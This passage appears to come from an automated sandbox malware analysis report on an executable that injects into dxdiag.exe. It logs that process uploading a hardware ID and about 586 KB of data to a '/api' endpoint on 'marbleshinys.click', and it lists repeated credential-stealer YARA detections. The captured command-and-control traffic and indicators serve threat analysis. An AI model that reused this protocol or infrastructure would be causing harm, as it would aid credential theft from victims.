                                                                                Set-Cookie: PHPSESSID=ng0s7o1r79e2tc73icik5bshgb; expires=Fri, 25 Apr 2025 08:42:16 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mUT68LBo3HB89RL5DxhgPWQPR3HrhriFhAU%2FGW9xwhCBKf8RbWkoTEwSAA6r%2B0Z%2BncsOV1hsvhPVjgaZ6%2FtDHBG6PsWi%2FklbrvIwCsaSy7UMR1Sgt09rqPVC9TJormyWIqGyRXY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8fa2df2fe96ec427-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1651&rtt_var=632&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2086&delivery_rate=1715628&cwnd=32&unsent_bytes=0&cid=d0e5b8d7984b4051&ts=895&x=0"
                                                                                2024-12-30 14:55:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-30 14:55:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.1164254172.67.148.1184438016C:\Windows\SysWOW64\dxdiag.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-30 14:55:38 UTC281OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=HBJCJS19A2ZIMW
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 586319
                                                                                Host: marbleshinys.click
                                                                                2024-12-30 14:55:38 UTC15331OUTData Raw: 2d 2d 48 42 4a 43 4a 53 31 39 41 32 5a 49 4d 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 46 41 39 41 46 36 41 37 39 43 36 44 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 48 42 4a 43 4a 53 31 39 41 32 5a 49 4d 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 42 4a 43 4a 53 31 39 41 32 5a 49 4d 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 48 42 4a 43 4a 53 31 39 41 32
                                                                                Data Ascii: --HBJCJS19A2ZIMWContent-Disposition: form-data; name="hwid"F6FA9AF6A79C6DF138ACDDE148F97B32--HBJCJS19A2ZIMWContent-Disposition: form-data; name="pid"1--HBJCJS19A2ZIMWContent-Disposition: form-data; name="lid"ZqchOa--new--HBJCJS19A2
                                                                                2024-12-30 14:55:38 UTC15331OUTData Raw: ee 6b ff 9f 1d 91 14 3d 88 e1 90 05 f5 09 ff d9 cd e4 b4 80 18 3a 05 b0 13 0e 8e 09 e7 13 f8 a1 5c ef 4a 9b d8 89 61 1f ab dd 72 10 81 38 a2 21 4f b2 c7 50 f0 65 ad 62 39 f0 0e 31 69 3d 42 c0 ba 6f eb 4d 14 1f 61 97 45 95 2f 5a df 01 44 ee e4 79 ba d1 67 d6 12 0c d0 0a f7 c3 e9 4a f9 07 18 d5 6c b4 48 5d 8d b2 f5 af 8e 73 dc af ee 8a 91 21 49 ba 94 4a 48 a7 d0 13 f1 fe dc ef 9e de fc 57 5e e0 87 68 86 9c e4 85 66 c3 f9 b8 1a 65 b6 ea 8c 91 1f 0b 17 b5 73 ae 4c 1d 26 c3 66 82 40 63 ca ad cb 7e 12 9a 39 4e bf c6 b7 24 09 be 95 e2 18 2c f7 d1 d0 43 c9 ec 6b 46 c5 28 72 73 5c 74 9a 66 da 66 4b 78 a7 63 15 49 76 e4 b2 aa 9b 88 3c 76 e3 aa 82 56 06 cc 4f ee b9 a9 a3 97 f5 c0 b7 69 02 dd 9c 9d 15 45 c2 46 4f 57 4d 60 d9 96 2d aa 14 95 b1 d1 a7 4a 0f 7e 22 51 67
                                                                                Data Ascii: k=:\Jar8!OPeb91i=BoMaE/ZDygJlH]s!IJHW^hfesL&f@c~9N$,CkF(rs\tffKxcIv<vVOiEFOWM`-J~"Qg
                                                                                2024-12-30 14:55:38 UTC15331OUTData Raw: 03 d5 c6 48 43 d1 6b db 3e b8 27 98 08 ec 50 ba f2 7a ff c1 a1 ed a8 02 90 d2 ab 7f f6 ed 6e bf 33 43 11 3d eb 38 7a de 0e 55 2f 30 21 af 04 4b a3 0e 8a 2b 4e 40 9f ab eb 3a 37 12 fa 16 ac 5f 68 13 96 a1 5d 1b 81 c7 97 5c 71 10 31 c1 d4 61 43 2c 01 2d f3 b7 79 41 ae e6 a9 95 af 53 ca 4e 34 18 c9 4d 36 fb 9d c8 86 50 b7 98 87 20 b9 21 5c 74 d1 61 c9 6c 52 45 d0 54 5f 50 6b a7 45 f4 74 a7 1b f7 a1 18 25 53 42 c8 dc 49 8d fb dd ca 27 17 af 35 6a d9 99 2f 76 b1 1d 41 c0 bc e7 73 c5 db e3 c2 7d b1 03 78 ad 8e 0a dc 1b 97 4a e0 57 78 9d d4 ce c9 9d b5 49 8b e2 17 f4 ce 2d 6a c7 34 99 38 95 10 8e a4 45 7a 5e af 8f a5 5e 56 09 98 9f e6 92 86 f2 24 67 f6 30 13 90 04 97 26 39 5e f7 e9 5d 7f c5 b8 a8 56 f2 bc 89 51 95 0d 12 a2 13 ba 36 6f f2 11 55 89 ce d1 8e bc 93
                                                                                Data Ascii: HCk>'Pzn3C=8zU/0!K+N@:7_h]\q1aC,-yASN4M6P !\talRET_PkEt%SBI'5j/vAs}xJWxI-j48Ez^^V$g0&9^]VQ6oU
                                                                                2024-12-30 14:55:38 UTC15331OUTData Raw: a3 56 a0 52 83 54 46 92 75 a1 08 38 fb 29 03 ed 17 bf d1 04 b2 22 8c 4d 4c 55 04 c4 37 e5 46 be 88 7d 72 71 8c 4c d8 41 e3 7b 85 54 a7 1a 3f ed ce 21 14 5e b8 1b 5b c6 bd c4 47 e2 f4 d5 6e 56 60 79 78 a8 49 e4 52 15 5d 17 5c 18 cf 3e 44 0a 76 11 30 be 44 50 ef d7 fa 44 e3 98 0f 3d b3 34 42 e8 cc 2c 36 18 a0 a3 50 c1 51 e1 b8 8d 8e ee 9c 43 a4 04 fe 5e 0b 78 c5 c0 54 22 da 2b 6e ac a7 73 40 aa fc a5 4a a1 e0 fe 27 d0 71 59 a5 ab 7d 76 f4 12 ea 31 28 ab 72 5d 1c 67 59 77 c0 54 5f f9 8b d2 9d 4c d0 5e 26 58 2c 6d 37 21 64 0f 2c b4 b2 43 6b 00 5a d9 5a 6d 7c 55 05 49 29 ea 26 eb 63 46 8b a3 77 3c e2 2c 1c 9a e0 df 7f 60 b4 82 a6 30 fb 3d 4b 5e 49 c1 29 cc 1e 5c 82 32 eb 0d fc 05 ec e3 ba 0c 81 a0 cf 2f 8e cd 27 39 c6 f9 f1 bd f6 86 a1 d7 45 40 fe da 07 b0 f7
                                                                                Data Ascii: VRTFu8)"MLU7F}rqLA{T?!^[GnV`yxIR]\>Dv0DPD=4B,6PQC^xT"+ns@J'qY}v1(r]gYwT_L^&X,m7!d,CkZZm|UI)&cFw<,`0=K^I)\2/'9E@
                                                                                2024-12-30 14:55:38 UTC15331OUTData Raw: ee d4 93 88 e4 ff 5b c9 fa 3a 02 16 b5 50 94 df 48 58 99 64 25 6c 8e d7 c1 a3 3f 2b 0c 46 75 46 e5 c3 26 0c 66 ce be 5e fa e4 00 b0 7f 68 21 ad cd 94 6a d6 42 9a 67 e3 27 41 20 31 50 40 f0 e2 5e 91 c6 26 1e 80 8a 22 4c 93 3f 32 da 2b b1 53 c3 ca a8 8e 72 b5 fb 44 13 9a 51 be c8 ec f6 c7 11 76 c4 5c 56 50 92 2a 15 15 26 03 c5 98 8c c9 fb 71 96 64 18 6d fb 51 42 53 eb 0d 70 f1 81 62 ff 77 b9 3b 08 3a b5 d8 7c 9e f4 59 21 22 00 45 f1 5b ab f0 f8 bd 7c e2 e2 b6 31 42 55 db 19 bc 97 c0 0d b9 52 7d 24 ef 2c 6e b3 44 ba 6b c0 ad 95 1e a1 9f 86 1c 85 10 3d fe 09 5b ef 3c 92 db ad a1 ac bf 1d db e2 16 4c 82 54 6b 15 16 5f 5f 21 74 dd 7f a9 2a 9a fd 28 e9 47 75 3c b2 b8 a5 41 17 da be 0c 71 bb 53 d5 9d c2 69 4f 03 bb 96 4f 6e 62 a0 ac a6 08 68 c9 1a f5 22 a1 16 c7
                                                                                Data Ascii: [:PHXd%l?+FuF&f^h!jBg'A 1P@^&"L?2+SrDQv\VP*&qdmQBSpbw;:|Y!"E[|1BUR}$,nDk=[<LTk__!t*(Gu<AqSiOOnbh"
                                                                                2024-12-30 14:55:38 UTC15331OUTData Raw: 2a c0 94 18 f3 8b 44 48 dc f4 f6 33 eb ce 39 27 fb e6 3b a4 5c cc fe 1d 5d 31 91 90 d1 04 f9 2a 08 47 e7 af fa 6c 35 46 0b 10 bd ce cd c8 10 db a3 b9 19 30 af 04 29 3a 51 31 21 20 32 a5 e0 fc 47 25 85 f0 32 78 a7 8f 59 66 55 e1 01 53 35 36 45 42 a6 8e 4d 7a 10 b1 47 48 48 32 c1 8e 92 73 b2 4e eb 90 7c aa a4 0c 08 9b 1e eb 0c 53 de ad 38 10 2b 59 e7 77 21 e3 ce 66 e4 8a ad 97 26 cf 4e 15 25 4d 34 34 81 88 c3 53 f2 d1 ef 8d 7f ef b8 91 1f b7 c3 5e 7e 6c 42 28 f2 cf 05 51 0e 62 9c 4f 51 1c db 68 1c ab a1 a3 1b 80 58 b0 d1 1b 09 81 11 21 88 ec 7e 6b 3f 1f 84 79 25 a8 71 0b da 8d d8 3b ab 9d 07 68 4e 56 97 5d 69 fc e0 c4 7f 64 79 10 7e 55 17 a2 c5 f1 77 4d 63 dc 1f b6 94 f8 f7 be d7 aa da b8 b2 d2 d0 70 f2 45 62 87 9c 8f e7 dd 0b c9 ab 3d 0e 3e e6 a4 0a ee e6
                                                                                Data Ascii: *DH39';\]1*Gl5F0):Q1! 2G%2xYfUS56EBMzGHH2sN|S8+Yw!f&N%M44S^~lB(QbOQhX!~k?y%q;hNV]idy~UwMcpEb=>
                                                                                2024-12-30 14:55:38 UTC15331OUTData Raw: ad e7 41 7c 5a 34 1c e6 cb fe fd 35 96 1f c3 cf 0b a8 76 d6 9a f8 dc 6a 62 80 32 14 e8 d5 b4 3a bf b0 4e 13 c3 ef 3d 8c f4 00 a5 a2 e4 56 52 20 4f 4c 60 fa c8 31 1c 91 28 0f 21 7f 53 39 6f db ca d5 cf 08 31 c1 c4 1c 3b 8d cb 34 34 c7 51 72 a0 be 0a b6 2a 38 43 91 79 b6 60 6e ae e4 92 a1 8b 91 fc 33 65 e8 85 48 5e 80 9a 85 b8 62 e0 62 a2 08 cd 5e 08 7d 4a 2a fa a5 4d 78 f2 31 22 26 5a 55 d8 ef 40 2d 52 f6 c8 77 4c ea 3c 89 df 33 c3 78 ac d7 64 de ee 36 aa 44 51 fe c2 ba bb 78 ad b8 30 11 74 7e cf 26 58 33 36 7f e6 68 28 bf a8 33 9c ef 2c a3 04 8b 5e 96 b9 ca 8f 57 76 16 9f 8b 68 42 1f 45 d1 ac 31 7d 28 32 cd 00 0b db 79 84 6f 46 ee 9e 41 7d d9 4e 4e bf 33 fa a6 c0 a4 72 5b 31 80 b0 1e 07 63 05 8f 25 4b 02 fb c9 6c e1 ba ed a2 37 f7 5b 2f 0c fc e5 82 13 24
                                                                                Data Ascii: A|Z45vjb2:N=VR OL`1(!S9o1;44Qr*8Cy`n3eH^bb^}J*Mx1"&ZU@-RwL<3xd6DQx0t~&X36h(3,^WvhBE1}(2yoFA}NN3r[1c%Kl7[/$
                                                                                2024-12-30 14:55:38 UTC15331OUTData Raw: e6 ec 8d da 63 f9 32 b5 d9 56 c9 95 51 c7 dc b7 32 d7 bc 7a 70 7d 61 5e a6 db 45 f8 42 76 0c 49 7c 88 23 25 46 1e f6 cd a4 da 67 0c f9 05 67 6c 2c c6 08 55 04 b5 7f 88 ee 67 cf d1 c5 52 78 ec 6f 4b 8b cc 5f a1 af 48 8a 4b e3 e1 4c 88 ba b2 db ea e7 52 86 48 b2 20 e9 bd 37 31 c8 77 c9 92 57 5d ce 7e 75 03 a2 5c ab 91 02 f1 86 8b 7d ac c4 10 e3 c5 5e db 29 1e 7b 2a 32 46 9a 94 c9 fe 77 fe 61 55 c1 ac ff 13 be 1b c9 df ee 2b a3 06 08 46 52 74 e6 38 fb 84 16 83 65 25 55 e7 b0 d9 b9 71 9d b0 59 bb 40 8b 0e 4c a3 ce 36 22 c9 16 71 24 ff 6b a6 1e 6b 07 6f 87 8d fe 3b 37 be c8 1b 19 1f a9 6b 5e 18 4f 2c 14 c7 61 3d 28 d7 06 8c 94 98 a2 6d 35 f6 0d 55 27 6e cd 07 bb 2e 6e 20 3b 20 1d d2 b2 09 db b7 5f 37 73 9c 67 e9 bb f1 17 9e ba 99 f9 cf f9 b5 40 49 8e 09 65 a0
                                                                                Data Ascii: c2VQ2zp}a^EBvI|#%Fggl,UgRxoK_HKLRH 71wW]~u\}^){*2FwaU+FRt8e%UqY@L6"q$kko;7k^O,a=(m5U'n.n ; _7sg@Ie
                                                                                2024-12-30 14:55:38 UTC15331OUTData Raw: d0 62 fc af 1d 2d bf 7e 7f 13 c2 96 86 18 37 19 5b 13 50 d8 97 e3 d2 64 2b cb 2c cd e2 f4 83 e5 1d 2f 94 ef f4 de fb 63 6a 20 dc 0f 2b 29 d0 e6 b2 ec b2 df 88 ba f6 43 05 2b 3b c7 10 55 41 05 63 e5 3d d0 b5 a7 26 be dd 9a f6 16 c6 fd 3f 13 80 f8 f5 98 05 b0 c6 12 25 c4 c8 c2 68 23 4b 78 f8 b7 17 06 e2 a0 e1 33 0c f1 17 78 9c 10 e9 f5 15 b0 35 9b 00 48 2c 5f 16 71 b4 04 d8 96 14 04 2c c4 39 84 78 73 9f f2 28 dc 11 43 d8 ce 28 a9 5d b0 fe 3c 53 f7 b7 9a dd 95 4d 0d 2e b2 07 39 f3 f1 be cf 90 26 70 fc 09 fe ec 24 dc 52 ce ce 68 0c 99 5c 2f 01 c9 d3 ea 1b 64 08 6b 43 e2 d3 cd fd b1 5a 40 55 e7 d2 55 6c bd 8a 2a 3e a7 26 0d 99 e7 43 41 98 d5 08 34 aa a1 76 fc f9 fe 18 7e a0 05 d5 ab 58 7b b0 35 7a 72 4a 92 c8 b8 2c 66 83 69 fa d6 9c 80 61 d0 a8 c4 0f 80 20 5f
                                                                                Data Ascii: b-~7[Pd+,/cj +)C+;UAc=&?%h#Kx3x5H,_q,9xs(C(]<SM.9&p$Rh\/dkCZ@UUl*>&CA4v~X{5zrJ,fia _
                                                                                2024-12-30 14:55:38 UTC15331OUTData Raw: 28 f6 20 ba 7f 3c da ab 60 b8 a7 87 b3 af ae b0 b6 3b dd 85 58 18 3a 25 a6 ed 34 6a ba b2 68 fa c0 80 f0 c8 60 e1 93 c7 e2 3e 25 9f b7 4c 91 f9 9f 89 99 b7 ba 69 83 c3 d1 d3 e7 68 39 a7 c7 54 0a 0d 9f 15 bd 4b 54 8b f6 82 8f a8 b7 49 3f 50 7f 57 29 e3 83 e7 5c ab da 34 34 fd 67 f6 17 78 14 49 53 57 0c ff 27 59 b4 b1 42 c0 b1 95 ef 6e ef 55 fc 7a e7 a2 52 af c5 31 8c 2a 1f a3 ab 66 7c 3c a9 d6 10 15 55 bd 6b 6f e9 97 86 72 bb 46 84 45 74 b8 90 d8 24 f6 74 8b 35 31 6f b6 5e eb 6d fd dd 8b e2 0d 26 a0 ae 97 ea 2c 30 11 d3 80 8b 68 74 44 9c 42 af bf 94 02 bc 4e d1 c0 9f 6b 25 9b 6a cc 4c 8e 75 46 dd c2 57 63 fa b2 14 7a 55 8d fb 71 79 8f 98 48 ed 9f e2 90 9f a1 e3 37 bb 81 0e fd 67 cc 1a 4d db 35 a5 6e 91 e1 a0 0c 8c bb 0e 33 f4 95 50 fd 2c 02 05 02 b6 2d 43
                                                                                Data Ascii: ( <`;X:%4jh`>%Lih9TKTI?PW)\44gxISW'YBnUzR1*f|<UkorFEt$t51o^m&,0htDBNk%jLuFWczUqyH7gM5n3P,-C
                                                                                2024-12-30 14:55:40 UTC1143INHTTP/1.1 200 OK
                                                                                Date: Mon, 30 Dec 2024 14:55:40 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=frpkojpbknhefh9m1h7kjp7obj; expires=Fri, 25 Apr 2025 08:42:19 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IJ6R%2BCGF16zs2a9oU%2FD%2FwBl%2Bzl%2F4iheiqKjXtzz05LSnv2CDfGzbcC%2Fiz3Sorh6bpj8SgLOHOermwOJ0GgxcubDLlEfNrU6lFN%2FifyOBHtpgHaiKkTqwQoCmN3Srbv705uvLrvs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8fa2df3b5fc57c96-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1814&rtt_var=682&sent=333&recv=598&lost=0&retrans=0&sent_bytes=2845&recv_bytes=588908&delivery_rate=1602634&cwnd=173&unsent_bytes=0&cid=d2a7674d318f5d6c&ts=1972&x=0"


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.1164270172.67.148.1184438016C:\Windows\SysWOW64\dxdiag.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-30 14:55:41 UTC266OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 80
                                                                                Host: marbleshinys.click
                                                                                2024-12-30 14:55:41 UTC80OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 71 63 68 4f 61 2d 2d 6e 65 77 26 6a 3d 26 68 77 69 64 3d 46 36 46 41 39 41 46 36 41 37 39 43 36 44 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32
                                                                                Data Ascii: act=get_message&ver=4.0&lid=ZqchOa--new&j=&hwid=F6FA9AF6A79C6DF138ACDDE148F97B32
                                                                                2024-12-30 14:55:41 UTC1121INHTTP/1.1 200 OK
                                                                                Date: Mon, 30 Dec 2024 14:55:41 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=i8jkf4c47vvbj4lfo28cu871kp; expires=Fri, 25 Apr 2025 08:42:20 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3dgqZznk6vHDGALp7IzcgXZtJriIb6goZACv81VKWSYuG12Aku1UFYegr8DNmxsIe7c8T8W5dOubxKnQyWVlaHaCMBA6CCdKHhZOBS2LdppT9WNh2NB8CDIiq7KdV4JTlGNLbXw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8fa2df4a9f5472b9-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1870&min_rtt=1828&rtt_var=715&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=982&delivery_rate=1597374&cwnd=214&unsent_bytes=0&cid=5338809f5ac34861&ts=512&x=0"
                                                                                2024-12-30 14:55:41 UTC54INData Raw: 33 30 0d 0a 4a 6d 58 6d 56 36 56 6f 5a 6d 30 6a 76 46 4e 58 45 42 62 67 4e 52 61 58 79 69 54 70 73 53 51 32 61 71 39 37 34 56 41 34 33 6d 35 39 4f 41 3d 3d 0d 0a
                                                                                Data Ascii: 30JmXmV6VoZm0jvFNXEBbgNRaXyiTpsSQ2aq974VA43m59OA==
                                                                                2024-12-30 14:55:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:09:55:13
                                                                                Start date:30/12/2024
                                                                                Path:C:\Users\user\Desktop\PI1EA8P74K.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\PI1EA8P74K.exe"
                                                                                Imagebase:0x7ff713700000
                                                                                File size:12'940'800 bytes
                                                                                MD5 hash:4DE5DDC2A970F98EFE99DC22C5B2DE78
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:09:55:15
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\SysWOW64\dxdiag.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                                                Imagebase:0xa30000
                                                                                File size:222'720 bytes
                                                                                MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1571272583.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1567861669.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1570587188.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1569901131.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1570198116.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566987811.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1576883133.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1578784333.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1569019682.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566706853.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1567162517.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566093282.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1540180374.000000000301F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1578277745.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1583499340.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1577721314.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1568656377.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1581059278.000000000301F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1565623403.000000000301F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566593228.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1571636824.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1574086916.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1565979094.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1568493204.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1585491290.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1572522073.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1567592332.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566813341.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1568118321.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
